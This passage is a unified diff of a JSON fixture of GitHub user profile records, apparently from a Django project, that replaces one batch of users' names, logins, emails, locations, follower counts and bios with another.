"ghchinoy", + "email": "ghcfilter+github@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/469685?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 24, - "followers_count": 18, - "public_gists_count": 3, - "public_repositories_count": 36, - "created_at": "2016-02-25T17:49:56Z", - "updated_at": "2024-07-02T10:18:36Z", - "node_id": "MDQ6VXNlcjE3NDgwNDM4", + "following_count": 42, + "followers_count": 60, + "public_gists_count": 8, + "public_repositories_count": 169, + "created_at": "2010-11-06T02:46:31Z", + "updated_at": "2024-09-13T11:32:52Z", + "node_id": "MDQ6VXNlcjQ2OTY4NQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417628,74 +676727,74 @@ }, { "model": "github.user", - "pk": 2296, + "pk": 7633, "fields": { - "nest_created_at": "2024-09-12T01:14:20.273Z", - "nest_updated_at": "2024-09-12T01:14:20.273Z", - "name": "Δpxitekt0r", - "login": "apxitekt0r", + "nest_created_at": "2024-09-22T09:34:44.943Z", + "nest_updated_at": "2024-09-22T19:33:47.386Z", + "name": "GDS", + "login": "GDS98", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36531246?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/50288897?v=4", "company": "", - "location": "Moscow", + "location": "Italy", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, + "following_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2018-02-16T08:08:02Z", - "updated_at": "2024-07-12T14:02:25Z", - "node_id": "MDQ6VXNlcjM2NTMxMjQ2", - "bio": "I explore for myself something new to develop myself.", + "public_repositories_count": 2, + "created_at": "2019-05-05T08:30:19Z", + "updated_at": "2020-05-02T16:22:02Z", + "node_id": "MDQ6VXNlcjUwMjg4ODk3", + "bio": "Engineering design, based in Italy", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2297, + "pk": 7634, "fields": { - "nest_created_at": "2024-09-12T01:14:21.079Z", - "nest_updated_at": "2024-09-12T01:14:21.079Z", - "name": "Ashad Mohamed", - "login": "deigott", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/143202415?v=4", - "company": "@thelitesecurity", - "location": "", + "nest_created_at": "2024-09-22T09:34:45.261Z", + "nest_updated_at": "2024-09-22T19:33:47.707Z", + "name": "Gabriel Harris-Rouquette", + "login": "gabizou", + "email": "github@gabizou.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1203877?v=4", + "company": "@merit", + "location": "Los Angeles, CA", "collaborators_count": 0, - "following_count": 45, - "followers_count": 29, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2023-08-25T14:58:51Z", - "updated_at": "2024-08-29T13:56:51Z", - "node_id": "U_kgDOCIkYbw", - "bio": "ist es sicher?", + "following_count": 22, + "followers_count": 88, + "public_gists_count": 12, + "public_repositories_count": 106, + "created_at": "2011-11-18T07:43:37Z", + "updated_at": "2024-09-19T23:58:55Z", + "node_id": "MDQ6VXNlcjEyMDM4Nzc=", + "bio": "Software Engineer at @merit \r\n\r\nHobby Project Lead at @SpongePowered building software related to Minecraft: Java Edition", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2298, + "pk": 7635, "fields": { - "nest_created_at": "2024-09-12T01:14:21.990Z", - "nest_updated_at": "2024-09-12T01:32:13.040Z", - "name": "", - "login": "lme-nca", + "nest_created_at": "2024-09-22T09:34:45.579Z", + "nest_updated_at": "2024-09-22T19:33:48.028Z", + "name": "Heather Baden", + "login": "heatherbaden", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/79927042?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20437306?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, + "following_count": 2, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2021-03-02T15:50:59Z", - "updated_at": "2022-12-16T09:51:40Z", - "node_id": "MDQ6VXNlcjc5OTI3MDQy", + "public_repositories_count": 4, + "created_at": "2016-07-13T10:11:22Z", + "updated_at": "2022-10-04T07:00:21Z", + "node_id": "MDQ6VXNlcjIwNDM3MzA2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417703,124 +676802,124 @@ }, { "model": "github.user", - "pk": 2299, + "pk": 7636, "fields": { - "nest_created_at": "2024-09-12T01:14:23.357Z", - "nest_updated_at": "2024-09-12T01:14:23.357Z", - "name": "", - "login": "alfajr", - "email": "muhammadalfajri13@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/16153856?v=4", + "nest_created_at": "2024-09-22T09:34:45.904Z", + "nest_updated_at": "2024-09-22T19:33:48.353Z", + "name": "Ian Dees", + "login": "iandees", + "email": "ian.dees@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/261584?v=4", "company": "", - "location": "", + "location": "Saint Paul, MN", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2015-12-04T15:01:19Z", - "updated_at": "2024-06-13T19:34:14Z", - "node_id": "MDQ6VXNlcjE2MTUzODU2", + "following_count": 14, + "followers_count": 273, + "public_gists_count": 26, + "public_repositories_count": 227, + "created_at": "2010-05-01T22:20:34Z", + "updated_at": "2024-09-22T04:31:27Z", + "node_id": "MDQ6VXNlcjI2MTU4NA==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2300, + "pk": 7637, "fields": { - "nest_created_at": "2024-09-12T01:14:27.204Z", - "nest_updated_at": "2024-09-12T01:14:27.204Z", - "name": "Sergio Fernández", - "login": "GeiserX", + "nest_created_at": "2024-09-22T09:34:46.215Z", + "nest_updated_at": "2024-09-22T19:33:48.664Z", + "name": "Ingmar Stein", + "login": "IngmarStein", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9169332?v=4", - "company": "ACSdesk", - "location": "Spain", + "avatar_url": "https://avatars.githubusercontent.com/u/490610?v=4", + "company": "@google", + "location": "Zurich", "collaborators_count": 0, - "following_count": 9, - "followers_count": 20, - "public_gists_count": 1, - "public_repositories_count": 37, - "created_at": "2014-10-12T21:57:52Z", - "updated_at": "2024-08-26T20:22:29Z", - "node_id": "MDQ6VXNlcjkxNjkzMzI=", - "bio": "Cloud DevOps Engineer", - "is_hireable": true, - "twitter_username": "" + "following_count": 2, + "followers_count": 55, + "public_gists_count": 2, + "public_repositories_count": 22, + "created_at": "2010-11-21T13:19:50Z", + "updated_at": "2024-09-17T11:20:28Z", + "node_id": "MDQ6VXNlcjQ5MDYxMA==", + "bio": "", + "is_hireable": false, + "twitter_username": "ingmarstein" } }, { "model": "github.user", - "pk": 2301, + "pk": 7638, "fields": { - "nest_created_at": "2024-09-12T01:14:28.463Z", - "nest_updated_at": "2024-09-12T01:14:28.463Z", - "name": "Benjamin", - "login": "prempador", + "nest_created_at": "2024-09-22T09:34:46.539Z", + "nest_updated_at": "2024-09-22T19:33:48.977Z", + "name": "Irfaq Syed", + "login": "irazasyed", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9047327?v=4", - "company": "", - "location": "Vienna", + "avatar_url": "https://avatars.githubusercontent.com/u/1915268?v=4", + "company": "@lukonet", + "location": "127.0.0.1", "collaborators_count": 0, - "following_count": 24, - "followers_count": 20, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2014-10-07T06:48:04Z", - "updated_at": "2024-08-25T14:17:52Z", - "node_id": "MDQ6VXNlcjkwNDczMjc=", - "bio": "Staff IT Security Engineer at @bitpanda-labs ", - "is_hireable": false, - "twitter_username": "" + "following_count": 6, + "followers_count": 588, + "public_gists_count": 106, + "public_repositories_count": 46, + "created_at": "2012-07-02T18:25:56Z", + "updated_at": "2024-08-28T18:06:02Z", + "node_id": "MDQ6VXNlcjE5MTUyNjg=", + "bio": "🚀 Founder @lukonet ​        \r\n💬 Founder @PHPChat    \r\n   \r\n🤖 Creator @telegram-bot-sdk", + "is_hireable": true, + "twitter_username": "iRazaSyed" } }, { "model": "github.user", - "pk": 2302, + "pk": 7639, "fields": { - "nest_created_at": "2024-09-12T01:14:30.958Z", - "nest_updated_at": "2024-09-12T01:14:30.958Z", - "name": "Steve Lohr", - "login": "schdief", - "email": "schdief.law@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/10979159?v=4", - "company": "DHL Group", - "location": "Schmölln-Putzkau", + "nest_created_at": "2024-09-22T09:34:46.845Z", + "nest_updated_at": "2024-09-22T19:33:49.307Z", + "name": "Istratov Dmitrii", + "login": "funkill", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4323287?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 5, - "created_at": "2015-02-12T16:03:45Z", - "updated_at": "2024-06-17T11:51:57Z", - "node_id": "MDQ6VXNlcjEwOTc5MTU5", + "following_count": 21, + "followers_count": 26, + "public_gists_count": 2, + "public_repositories_count": 59, + "created_at": "2013-05-02T15:48:32Z", + "updated_at": "2024-08-19T21:44:24Z", + "node_id": "MDQ6VXNlcjQzMjMyODc=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2303, + "pk": 7640, "fields": { - "nest_created_at": "2024-09-12T01:14:33.419Z", - "nest_updated_at": "2024-09-12T01:14:33.419Z", - "name": "", - "login": "sravanee98", + "nest_created_at": "2024-09-22T09:34:47.167Z", + "nest_updated_at": "2024-09-22T19:33:49.624Z", + "name": "Jacob", + "login": "jamcat22", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60765014?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1897053?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2020-02-07T02:19:28Z", - "updated_at": "2024-01-23T02:48:22Z", - "node_id": "MDQ6VXNlcjYwNzY1MDE0", + "following_count": 5, + "followers_count": 13, + "public_gists_count": 2, + "public_repositories_count": 2, + "created_at": "2012-06-27T05:13:19Z", + "updated_at": "2024-09-20T07:15:18Z", + "node_id": "MDQ6VXNlcjE4OTcwNTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417828,49 +676927,49 @@ }, { "model": "github.user", - "pk": 2304, + "pk": 7641, "fields": { - "nest_created_at": "2024-09-12T01:14:34.257Z", - "nest_updated_at": "2024-09-12T01:14:36.827Z", - "name": "Cedric Buissart", - "login": "cedricbu", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10559539?v=4", + "nest_created_at": "2024-09-22T09:34:47.484Z", + "nest_updated_at": "2024-09-22T19:33:49.937Z", + "name": "Jan Škoruba", + "login": "skoruba", + "email": "jan@skoruba.com", + "avatar_url": "https://avatars.githubusercontent.com/u/35664089?v=4", "company": "", - "location": "", + "location": "Prague, Czech Republic", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, + "following_count": 13, + "followers_count": 489, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2015-01-16T09:31:51Z", - "updated_at": "2024-06-07T09:47:25Z", - "node_id": "MDQ6VXNlcjEwNTU5NTM5", - "bio": "", + "public_repositories_count": 15, + "created_at": "2018-01-21T17:14:47Z", + "updated_at": "2023-10-01T11:00:24Z", + "node_id": "MDQ6VXNlcjM1NjY0MDg5", + "bio": "I am interested in @openid 🔐 • @oauth2 🔒 • @dotnet 🚀 • @reactjs ⚛", "is_hireable": false, - "twitter_username": "" + "twitter_username": "skoruba" } }, { "model": "github.user", - "pk": 2305, + "pk": 7642, "fields": { - "nest_created_at": "2024-09-12T01:14:35.612Z", - "nest_updated_at": "2024-09-12T01:14:35.612Z", - "name": "Davorin", - "login": "dkoci", - "email": "davorin85@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5565897?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:34:47.799Z", + "nest_updated_at": "2024-09-22T19:33:50.255Z", + "name": "Jason Schindler", + "login": "JasonTypesCodes", + "email": "jason@types.codes", + "avatar_url": "https://avatars.githubusercontent.com/u/1888131?v=4", + "company": "Object Computing, Inc.", + "location": "O'Fallon, IL", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 51, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2013-09-28T19:37:03Z", - "updated_at": "2024-07-04T11:47:01Z", - "node_id": "MDQ6VXNlcjU1NjU4OTc=", + "public_repositories_count": 81, + "created_at": "2012-06-25T03:34:12Z", + "updated_at": "2024-07-13T20:19:01Z", + "node_id": "MDQ6VXNlcjE4ODgxMzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417878,24 +676977,24 @@ }, { "model": "github.user", - "pk": 2306, + "pk": 7643, "fields": { - "nest_created_at": "2024-09-12T01:14:38.073Z", - "nest_updated_at": "2024-09-12T01:14:38.073Z", - "name": "", - "login": "lappsec", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22598243?v=4", + "nest_created_at": "2024-09-22T09:34:51.383Z", + "nest_updated_at": "2024-09-22T19:37:33.140Z", + "name": "Alexandru Dracea", + "login": "adracea", + "email": "adracea@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6214663?v=4", "company": "", - "location": "", + "location": "Romania", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2016-10-03T16:53:16Z", - "updated_at": "2023-11-17T01:45:25Z", - "node_id": "MDQ6VXNlcjIyNTk4MjQz", + "following_count": 16, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2013-12-18T13:22:46Z", + "updated_at": "2024-07-22T17:15:24Z", + "node_id": "MDQ6VXNlcjYyMTQ2NjM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417903,74 +677002,74 @@ }, { "model": "github.user", - "pk": 2307, + "pk": 7644, "fields": { - "nest_created_at": "2024-09-12T01:14:40.606Z", - "nest_updated_at": "2024-09-12T01:14:40.606Z", - "name": "Paul Volosen", - "login": "paul007ex", + "nest_created_at": "2024-09-22T09:34:52.021Z", + "nest_updated_at": "2024-09-22T19:33:54.327Z", + "name": "Ihebski", + "login": "ihebski", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43864272?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/13177580?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-10-04T21:04:36Z", - "updated_at": "2024-09-04T11:43:14Z", - "node_id": "MDQ6VXNlcjQzODY0Mjcy", - "bio": "", + "following_count": 912, + "followers_count": 847, + "public_gists_count": 35, + "public_repositories_count": 21, + "created_at": "2015-07-04T14:21:26Z", + "updated_at": "2024-08-29T23:35:32Z", + "node_id": "MDQ6VXNlcjEzMTc3NTgw", + "bio": "Security Engineer ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2308, + "pk": 7645, "fields": { - "nest_created_at": "2024-09-12T01:14:41.601Z", - "nest_updated_at": "2024-09-12T01:14:41.601Z", - "name": "Srikanth Kumbala", - "login": "skumbala40", + "nest_created_at": "2024-09-22T09:34:57.157Z", + "nest_updated_at": "2024-09-22T19:37:45.022Z", + "name": "Alexander", + "login": "AlexanderTyutin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/117395141?v=4", - "company": "VivSoft - BatCave Infra and Zero Trust", + "avatar_url": "https://avatars.githubusercontent.com/u/49285004?v=4", + "company": "TYUTIN.NET", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2022-11-03T19:50:01Z", - "updated_at": "2024-08-17T20:01:54Z", - "node_id": "U_kgDOBv9OxQ", - "bio": "", - "is_hireable": false, + "following_count": 6, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 21, + "created_at": "2019-04-04T16:30:35Z", + "updated_at": "2024-01-31T11:26:59Z", + "node_id": "MDQ6VXNlcjQ5Mjg1MDA0", + "bio": "Cybersecurity enthusiast", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2309, + "pk": 7646, "fields": { - "nest_created_at": "2024-09-12T01:14:42.440Z", - "nest_updated_at": "2024-09-12T01:14:42.440Z", - "name": "", - "login": "borovskimateusz", + "nest_created_at": "2024-09-22T09:34:59.076Z", + "nest_updated_at": "2024-09-22T19:34:01.374Z", + "name": "Matt", + "login": "mxc564", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/108801111?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/73848189?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 5, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-07-06T10:28:28Z", - "updated_at": "2024-04-29T07:27:32Z", - "node_id": "U_kgDOBnwsVw", + "public_repositories_count": 0, + "created_at": "2020-11-02T17:59:31Z", + "updated_at": "2022-04-13T19:44:13Z", + "node_id": "MDQ6VXNlcjczODQ4MTg5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -417978,24 +677077,24 @@ }, { "model": "github.user", - "pk": 2310, + "pk": 7647, "fields": { - "nest_created_at": "2024-09-12T01:14:43.752Z", - "nest_updated_at": "2024-09-12T01:14:43.752Z", + "nest_created_at": "2024-09-22T09:34:59.713Z", + "nest_updated_at": "2024-09-22T19:34:02.008Z", "name": "", - "login": "AlBellom", + "login": "tgonda-discovery", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92964768?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/56268598?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-10-22T02:53:31Z", - "updated_at": "2024-05-30T14:13:15Z", - "node_id": "U_kgDOBYqHoA", + "public_repositories_count": 5, + "created_at": "2019-10-07T16:13:18Z", + "updated_at": "2021-10-04T00:06:21Z", + "node_id": "MDQ6VXNlcjU2MjY4NTk4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418003,74 +677102,74 @@ }, { "model": "github.user", - "pk": 2311, + "pk": 7648, "fields": { - "nest_created_at": "2024-09-12T01:14:46.274Z", - "nest_updated_at": "2024-09-12T01:14:46.274Z", - "name": "Camilo Cota", - "login": "ccronca", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1499184?v=4", - "company": "Red Hat", - "location": "Droga Mleczna", + "nest_created_at": "2024-09-22T09:35:04.843Z", + "nest_updated_at": "2024-09-22T19:37:34.424Z", + "name": "Bhurinat Wangsutthitham", + "login": "natebwangsut", + "email": "nate.bwangsut@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4032361?v=4", + "company": "@agoda-com ", + "location": "Bangkok, Thailand", "collaborators_count": 0, - "following_count": 34, - "followers_count": 19, - "public_gists_count": 5, - "public_repositories_count": 317, - "created_at": "2012-03-04T11:09:58Z", - "updated_at": "2024-07-11T14:19:23Z", - "node_id": "MDQ6VXNlcjE0OTkxODQ=", - "bio": "", + "following_count": 15, + "followers_count": 15, + "public_gists_count": 6, + "public_repositories_count": 67, + "created_at": "2013-04-02T02:40:50Z", + "updated_at": "2024-08-10T17:52:24Z", + "node_id": "MDQ6VXNlcjQwMzIzNjE=", + "bio": "Just another software engineer living on the same planet as you do.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "natebwangsut" } }, { "model": "github.user", - "pk": 2312, + "pk": 7649, "fields": { - "nest_created_at": "2024-09-12T01:14:47.525Z", - "nest_updated_at": "2024-09-16T22:27:01.706Z", - "name": "", - "login": "ArsArmandi", + "nest_created_at": "2024-09-22T09:35:09.193Z", + "nest_updated_at": "2024-09-22T19:38:17.641Z", + "name": "Eric Anderson", + "login": "devEricA", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/66745241?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/90435670?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-06-10T17:28:58Z", - "updated_at": "2024-09-14T21:35:45Z", - "node_id": "MDQ6VXNlcjY2NzQ1MjQx", - "bio": "", + "public_repositories_count": 15, + "created_at": "2021-09-10T03:32:35Z", + "updated_at": "2022-03-16T17:35:06Z", + "node_id": "MDQ6VXNlcjkwNDM1Njcw", + "bio": "New account after making a critical mistake with my 2FA. Old account can be viewed at https://github.com/devEricA-zz", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2313, + "pk": 7650, "fields": { - "nest_created_at": "2024-09-12T01:14:50.201Z", - "nest_updated_at": "2024-09-12T01:14:50.201Z", - "name": "Spencer Ho", - "login": "revaspeho", + "nest_created_at": "2024-09-22T09:35:19.848Z", + "nest_updated_at": "2024-09-22T19:34:22.002Z", + "name": "Steve Carter", + "login": "steve-carter", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/83427905?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1542211?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 2, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-04-29T19:51:48Z", - "updated_at": "2024-09-03T21:02:56Z", - "node_id": "MDQ6VXNlcjgzNDI3OTA1", + "public_repositories_count": 5, + "created_at": "2012-03-15T23:54:11Z", + "updated_at": "2024-08-17T01:53:42Z", + "node_id": "MDQ6VXNlcjE1NDIyMTE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418078,24 +677177,24 @@ }, { "model": "github.user", - "pk": 2314, + "pk": 7651, "fields": { - "nest_created_at": "2024-09-12T01:14:51.477Z", - "nest_updated_at": "2024-09-12T01:14:51.477Z", - "name": "Raph LALAN", - "login": "Raphaaaaaugh", + "nest_created_at": "2024-09-22T09:35:26.294Z", + "nest_updated_at": "2024-09-22T19:34:28.417Z", + "name": "Stephanie Ginovker", + "login": "sginovker", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/118915139?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/40722898?v=4", "company": "", - "location": "", + "location": "San Francisco, CA", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2022-11-23T15:04:52Z", - "updated_at": "2024-07-14T20:36:16Z", - "node_id": "U_kgDOBxaAQw", + "public_repositories_count": 6, + "created_at": "2018-06-30T18:44:07Z", + "updated_at": "2024-04-28T06:02:46Z", + "node_id": "MDQ6VXNlcjQwNzIyODk4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418103,24 +677202,49 @@ }, { "model": "github.user", - "pk": 2315, + "pk": 7652, "fields": { - "nest_created_at": "2024-09-12T01:14:52.849Z", - "nest_updated_at": "2024-09-12T01:14:52.849Z", - "name": "", - "login": "alexander-p2p", + "nest_created_at": "2024-09-22T09:35:26.928Z", + "nest_updated_at": "2024-09-22T19:34:29.048Z", + "name": "Brian Lam", + "login": "brianlam38", + "email": "brian.lam38@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10874834?v=4", + "company": "Salesforce", + "location": "Sydney, Australia", + "collaborators_count": 0, + "following_count": 105, + "followers_count": 79, + "public_gists_count": 5, + "public_repositories_count": 102, + "created_at": "2015-02-06T01:12:28Z", + "updated_at": "2024-09-20T01:52:10Z", + "node_id": "MDQ6VXNlcjEwODc0ODM0", + "bio": "Security @salesforce", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7653, + "fields": { + "nest_created_at": "2024-09-22T09:35:27.243Z", + "nest_updated_at": "2024-09-22T19:34:29.394Z", + "name": "testsecrbw", + "login": "testsecrbw", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/96881780?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/14541041?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-12-30T16:28:44Z", - "updated_at": "2024-08-13T14:08:11Z", - "node_id": "U_kgDOBcZMdA", + "public_repositories_count": 3, + "created_at": "2015-09-21T07:50:47Z", + "updated_at": "2023-10-25T21:12:53Z", + "node_id": "MDQ6VXNlcjE0NTQxMDQx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418128,24 +677252,24 @@ }, { "model": "github.user", - "pk": 2316, + "pk": 7654, "fields": { - "nest_created_at": "2024-09-12T01:14:54.141Z", - "nest_updated_at": "2024-09-12T01:15:40.237Z", - "name": "felipe", - "login": "johnfelipe", - "email": "ingenierofelipeurrego@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/428820?v=4", + "nest_created_at": "2024-09-22T09:35:28.205Z", + "nest_updated_at": "2024-09-22T19:34:30.390Z", + "name": "Heikki Salo", + "login": "deggis", + "email": "heikki.ao.salo@iki.fi", + "avatar_url": "https://avatars.githubusercontent.com/u/180190?v=4", "company": "", - "location": "", + "location": "Jyväskylä/Finland", "collaborators_count": 0, - "following_count": 1955, - "followers_count": 120, - "public_gists_count": 249, - "public_repositories_count": 1454, - "created_at": "2010-10-05T23:11:12Z", - "updated_at": "2024-07-18T14:14:38Z", - "node_id": "MDQ6VXNlcjQyODgyMA==", + "following_count": 21, + "followers_count": 31, + "public_gists_count": 6, + "public_repositories_count": 33, + "created_at": "2010-01-11T18:42:33Z", + "updated_at": "2024-08-26T11:22:25Z", + "node_id": "MDQ6VXNlcjE4MDE5MA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418153,24 +677277,24 @@ }, { "model": "github.user", - "pk": 2317, + "pk": 7655, "fields": { - "nest_created_at": "2024-09-12T01:14:55.420Z", - "nest_updated_at": "2024-09-12T01:14:55.420Z", + "nest_created_at": "2024-09-22T09:35:28.513Z", + "nest_updated_at": "2024-09-22T19:34:30.739Z", "name": "", - "login": "Nafanyya", + "login": "Eldorico", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/164300555?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6831330?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-03-21T04:57:43Z", - "updated_at": "2024-09-04T10:11:39Z", - "node_id": "U_kgDOCcsHCw", + "public_gists_count": 2, + "public_repositories_count": 10, + "created_at": "2014-03-02T14:08:21Z", + "updated_at": "2024-09-05T12:41:18Z", + "node_id": "MDQ6VXNlcjY4MzEzMzA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418178,74 +677302,74 @@ }, { "model": "github.user", - "pk": 2318, + "pk": 7656, "fields": { - "nest_created_at": "2024-09-12T01:14:57.986Z", - "nest_updated_at": "2024-09-12T01:14:57.986Z", - "name": "", - "login": "Muhammad-Irtaza", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/64648269?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:35:28.822Z", + "nest_updated_at": "2024-09-22T19:35:22.458Z", + "name": "Daniel Naab", + "login": "danielnaab", + "email": "danielnaab@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/136512?v=4", + "company": "Flexion | GSA/TTS/10x | Personal", + "location": "Madison, WI", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2020-05-01T14:18:53Z", - "updated_at": "2024-03-26T14:50:09Z", - "node_id": "MDQ6VXNlcjY0NjQ4MjY5", - "bio": "", - "is_hireable": false, + "following_count": 5, + "followers_count": 34, + "public_gists_count": 7, + "public_repositories_count": 65, + "created_at": "2009-10-07T20:17:56Z", + "updated_at": "2024-05-13T18:36:38Z", + "node_id": "MDQ6VXNlcjEzNjUxMg==", + "bio": "At @flexion I've helped on @gsa-tts, @CMSgov, and @usgs projects", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2319, + "pk": 7657, "fields": { - "nest_created_at": "2024-09-12T01:14:59.243Z", - "nest_updated_at": "2024-09-12T01:14:59.243Z", - "name": "", - "login": "6d69636861656c", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/169082156?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:35:29.144Z", + "nest_updated_at": "2024-09-22T19:34:31.365Z", + "name": "Guillaume GRABÉ", + "login": "Siryu6", + "email": "guillaume.grabe@protonmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17593547?v=4", + "company": "Payfit", + "location": "France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-05-06T17:08:25Z", - "updated_at": "2024-08-22T21:16:51Z", - "node_id": "U_kgDOChP9LA", - "bio": "", + "following_count": 11, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2016-03-02T13:03:44Z", + "updated_at": "2024-07-10T07:58:53Z", + "node_id": "MDQ6VXNlcjE3NTkzNTQ3", + "bio": "Application Security Engineer", "is_hireable": false, - "twitter_username": "" + "twitter_username": "Siiiryu" } }, { "model": "github.user", - "pk": 2320, + "pk": 7658, "fields": { - "nest_created_at": "2024-09-12T01:15:01.375Z", - "nest_updated_at": "2024-09-12T01:15:01.375Z", - "name": "", - "login": "G1P0", + "nest_created_at": "2024-09-22T09:35:29.462Z", + "nest_updated_at": "2024-09-22T19:35:53.441Z", + "name": "Robyn Mcneill", + "login": 